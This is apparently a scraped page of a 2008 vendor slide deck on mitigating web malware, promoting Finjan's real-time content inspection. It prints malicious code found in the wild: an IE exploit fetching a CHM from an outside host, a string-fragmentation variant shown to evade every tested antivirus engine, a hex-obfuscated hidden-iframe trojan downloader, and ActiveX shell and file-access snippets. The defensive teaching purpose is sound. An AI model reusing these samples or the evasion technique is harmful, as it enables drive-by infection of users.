The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 

Mitigating Malware Presentation Jkd 11 10 08 Aitp

  • 1. Chicago AITP – November 10, 2008 Devising a Strategy to Mitigate Malware Joann K. Davis (O) 847.304.1892 (C) 847.769.3018 [email_address]
  • 2. This presentation may contain images of websites which have been found to have served web content with embedded crimeware. The depicted reputable websites are NOT part of the crimeware problem described herein. They are in fact targets and victims of the new and sophisticated schemes employed by criminals in the distribution of crimeware that we see emerging today. This presentation uses Finjan as an EXAMPLE of Proactive Web Content Inspection technology and the MCRC as an EXAMPLE of Security Vendor research labs. Disclaimers
  • 3.
  • 4.
  • 5. McAfee : the number of keyloggers increased by 250% between January 2004 and May 2006. Phishing attacks increased by 100% only. Symantec : 4.7 million distinct computers are actively used in botnets to spit out spam, launch DoS (denial of service) attacks, install malware or log keystrokes for identity theft Sophos : Researchers are finding 29,700 new infected Web pages every day, and 80% of them are legitimate sites that have been compromised Microsoft : the Malicious Software Removal Tool (MSRT) has removed at least one Trojan from about 3.5 million unique computers. Of the 5.7 million infected Windows machines, about 62 percent was found with a Trojan or bot FBI : Over One Million victim computers are being actively used for botnets. Growth of Cybercrime Source: AV-Test Labs
  • 6.
  • 7.
  • 9.
  • 10. Anatomy of a ‘Drop-Site’ Server Review Stolen Information via Web Interface – Command and Control Attack Campaigns target specific groups, regions, and type of data. Logs are grouped by Country. Data is gathered as text and graphic images.
  • 11. Web-Based Command And Control Execute Commands Against Infected User Machines.
  • 12.
  • 13.
  • 14. Harvested Data: Full Screen Capture Actual Screenshots Logged to Crimeware Server
  • 15.
  • 16.
  • 17.
  • 18.
  • 19. Value Depends Upon Who and Where You Are
  • 20. Web Attacker Toolkits Toolkits Bring Hacking to the Masses Monitor the Success of Your Campaigns
  • 22. Crimeware Where You Least Expect It
  • 23. Malicious Websites by Category Challenges Traditional URL Filtering
  • 24.
  • 25. A Drive-By Attack An Innocent Free Game Website Simply visit this site to get infected. There is no need to click a link, download or install any software (at least that you are aware of).
  • 26. A Drive-By Attack An Innocent Free Game Website Exploits our desktop to install a Trojan
  • 27. A Drive-By Attack Each user session receives a different signature for the same exploit Dynamic Code Obfuscation
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36. Berkeley.edu Categorization by URL Filtering Not Categorized as Malicious
  • 37. Example of Malware using Fragmentation Original malicious page found in the wild Exploiting a well-known exploit of Internet Explorer described on: CVE-2004-0380 and MS04-013 Exploit <html><head></head> <body> <script> try{ document.write('<object data=&quot;&#'+109+';s-its:mhtml'+':'+'file://C:nosuch.mht! http://troyanov.net/001/chm/targ.chm ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>
  • 38. Detected by some AV Engines 9 out of 29 Anti-viruses successfully detected the known malicious code ( www.virustotal.com)
  • 39. Basic Code Modification Techniques Original malicious page found in the wild – “modified” Without changing the malicious code exploiting IE, we added a simple Javascript command that just add a dummy string. Will the Anti-Virus detect the malicious code….? Added string Fragmented string <html><head></head> <body <script> try{ document.write(‘dummy string’); document.write('<object data=&quot;&#'+109+';s-its:m' + 'h' + 't' + 'ml'+':'+'fi' + 'le://C:nosuch.m' + + 'ht! http://troyanov.net/001/chm/targ.chm ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>
  • 40. Circumnavigates Signatures and Heuristics 0 out of 29 Anti-viruses detected the known malicious code ( www.virustotal.com)
  • 41. How Does It Work? Finjan Vital Security TM NG <script> Document.write(“ BAD ”); </script> <script> Document.write(“ BA ” + “ D ”); </script> URL Filter Anti- Virus “ BAD ” Internet “ x.com ” Real-time Content Inspection Real-time content inspection technology determines the intent of the script and does not depend upon signatures or reputation of source. Crimeware is embedded in the web page, often unknown to even source servers of high reputation. Malicious code is blocked at the gateway protecting your system from harm. An employee points his browser to “ x.com” . For business productivity reasons, this site may be blocked. An employee points her browser to “ neededforwork.com” . AV software performs a database scan to match signatures of known malicious code. In this case, a match is found. Crimeware, even the still unknown threat, is blocked at the gateway protecting your system from harm. Just seconds later, a request to the same server eludes traditional signature-based detection via dynamic obfuscation techniques. Simple string fragmentation and code obfuscation techniques are used to evade signature-based protection mechanisms. By deconstructing the code to its constituent algorithms, scanner determines the mobile code’s true intent.
  • 42. Life Without Content Inspection Finjan Vital Security TM NG URL Filter Anti- Virus “ BAD ” Internet “ x.com ” Real-time Content Inspection <script> Document.write(“ BA ” + “ D ”); </script> Crimeware has infiltrated your environment. It executes with the same level of authorization as the user who accessed the infected web page. What information is available to that person and now the crimeware? Personnel Information Account Information Intellectual Property Trade Secrets Customer Information Userids/Passwords Financial Reports Customer Lists Payroll Data … Is this Information valuable to you? What could happen without scanning?
  • 43. Multi-Tiered Protection URL/Reputation Anti-Virus Real-time Content Inspection
  • 44. Reactive vs. Proactive Conventional Products Protect Against Known Attacks FW , AV, IPS / IDS, URL Next Generation Real-Time Content Inspection Java applet HTML EXE Java Script VB Script ActiveX Mobile Code Layer
  • 45.
  • 46. Web Security Violation Breakdown – Sample Audit Block Access to Spyware Sites Block Application Level Vulnerabilities Block Malicious Scripts by Behavior Block Malicious ActiveX, Java Applets and Executables Block Binary Exploits in Textual Files Block Known Viruses (Kaspersky) White List No Behavior Based Scanning Block Files with Suspicious Multiple Extensions Block Access to Blacklisted URLs Block Spoofed Content Block Potentially Malicious Archives Block Binary Objects with Invalid Digital Certificate Block Microsoft Office Documents containing Macros and/or Embedded Files Block Access to Adware Sites Block IM Tunneling 14,897 8,344 2,500 967 846 781 500 487 392 303 201 168 104 4 1
  • 47. Example - Malicious Behavior Detected behavior: Obfuscated Script URL: www.xrteam.com Code Sample <body>< script>function xy1q487ded85e3648(q487ded85e3e18){ return (parseInt(q487ded85e3e18,16));}function q487ded85e5588(q487ded85e5d59){ var q487ded85e652f='';q487ded85e846c=String.fromCharCode;for(q487ded85e6cf7=0;q487ded85e6cf7<q487ded85e5d59.length;q487ded85e6cf7+=2){ q487ded85e652f+=(q487ded85e846c(xy1q487ded85e3648(q487ded85e5d59.substr(q487ded85e6cf7,2))));}return q487ded85e652f;} var q487ded85e8c35='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533322533312533302533362533382532392532622532372536332536332536322533372533382536352533372532372532302537372536392536342537342536382533642533342533362532302536382536352536392536372536382537342533642533342533352533382532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q487ded85e5588(q487ded85e8c35));</script> <table width=&quot;790&quot; border=&quot;0&quot; align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;> Impact: Attempts to download a Trojan to the desktop (Trojan-Downloader.JS.Agent.ciw )
  • 48. Malware Example – File Create URL: http://www.nestle.com/js/WebTrends.js?lwt=8CA0EA3034E6FD4 Code Sample n = external.menuArguments; var wsh = new ActiveXObject (&quot;WScript.Shell&quot;); var fso = new ActiveXObject(&quot; Scripting.FileSystemObject &quot;); var tempfolder = fso.GetSpecialFolder(2); var filename = tempfolder.path + &quot;&quot; + fso.GetTempName(); var file Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
  • 49. Malware Example – File Write URL: http://www.talentplusspotlight.com/admin/htmlarea/editor.js Code Sample heckDocument() { oShell= new ActiveXObject(&quot;WScript.Shell&quot;); oShell.SendKeys( &quot;^c&quot; ); // copy oWord = new ActiveXObject (&quot;Word.Application&quot;); oWord.Documents.Add(); oWord.Selection.Paste(); oWord.ActiveDocument.CheckSpelling(); oWord.Selec Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
  • 50. Malware Example – File Query URL: http://www.nestle.com/js/WebTrends.js?lwt=8CA0EA3034E6FD4 Code Sample veXObject(&quot;WScript.Shell&quot;); var fso = new ActiveXObject (&quot; Scripting.FileSystemObject &quot;); var tempfolder = fso. GetSpecialFolder (2); var filename = tempfolder.path + &quot;&quot; + fso.GetTempName(); var file = fso.CreateTextFile(filename, true, true); fi Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
  • 51. Malware Example – Create Process URL: http://www.talentplusspotlight.com/admin/htmlarea/editor.js Code Sample heckDocument() { oShell= new ActiveXObject(&quot; WScript.Shell &quot;); oShell.SendKeys( &quot;^c&quot; ); // copy oWord = new ActiveXObject(&quot;Word.Application&quot;); oWord.Documents.Add(); oWord.Selection.Paste(); oWord.ActiveDocument.CheckSpelling(); oWord.Selec Impact: The WSript.Shell object provides functions to run a program locally, manipulate the contents of the registry, create a shortcut, access to system folder and environment variables, work with the registry and manage shortcuts. By using this object the end-user machine is compromised.
  • 52. Malware Example – Clipboard Vulnerability Detected behavior: IE Unauthorized Clipboard Contents Disclosure Vulnerability URL: http://www.hrci.org/dzapps/docs/htmlarea/editor.js Code Sample else if (cmdID.toLowerCase() == ' paste ') { editdoc. execCommand ('Paste'); var str=editdoc.body. createTextRange ().htmlText; if (str.indexOf(&quot;; mso-&quot;)>=0 ||str.indexOf(&quot;<v:&quot;)>=0 ||str.indexOf('class=&quot;Mso')>=0){ myclean(editdoc); } editdoc.body.innerHT Impact: This vulnerability could permit scripting operations to gain access to clipboard contents. This issue employs the execCommand('Paste') method to copy clipboard contents into small (or hidden) textarea. In this manner, security checks performed by the browser are bypassed and the clipboard contents will be copied.
  • 53.
  • 54. Example of Potentially Malicious Behavior Detected behavior: IE Shell.Application Object Script Execution Vulnerability URL: http://b.adserv.cn/E/J.JS Code Sample lbEFl0X].substring(1,z1IlbpFl0X[z1IlbEFl0X].length-1));if(z1IlbFFl0X){try{varz1IlcvFl0X=x0r1aW2Z(z1IlbFFl0X,&quot; Shell.Application &quot;);if(z1IlcvFl0X){z1IlctFl0X=z1IlEFl0X(z1IlbFFl0X);returnz1IlctFl0X;}}catch(e){}}z1IlbEFl0X++;}returnfalse;} Malicious Behavior: The Shell object represents the objects in the Windows Shell. This object expose methods which provides abilities to: Open, explore, and browse for folders; Minimize, restore, cascade, or tile open windows; Launch Control Panel applications; Display system dialog boxes. By using this object, the end-user machine is compromised.
  • 55.
  • 56. Web Monitor module The results of the scan (“ok” or “bad”) are returned to the Web Monitor module where next step processing may include notifying Administrators via Email of the discovery of malicious content on your website. Finjan Vital Security TM NG plus Anti-Virus A Web Monitor Module is configured to automatically scan web pages served by your company. If these pages are found to have been compromised by malicious content, an alert will be sent. Note: the Web Monitor module is custom code . The Web Monitor Module issues an HTTP GET request for every URL your company serves or only those you wish to scan. Besides being able to monitor the uptime and response time of your web servers, it will scan for crimeware. Using a combination of Anti-Virus and real-time content inspection technologies, the page is scanned for malicious content… Monitoring Your Web Servers
  • 57.
  • 58.
  • 59. Example of Vendor Resources
  • 61.
  • 62.
  • 63.
  • 64.
  • 65.
  • 66.

Notas del editor

  1. This is a product presentation You should use this presentation after explaining Finjan’s value proposition and company background If you need some slides to better explain the problem, use the MCRC presentation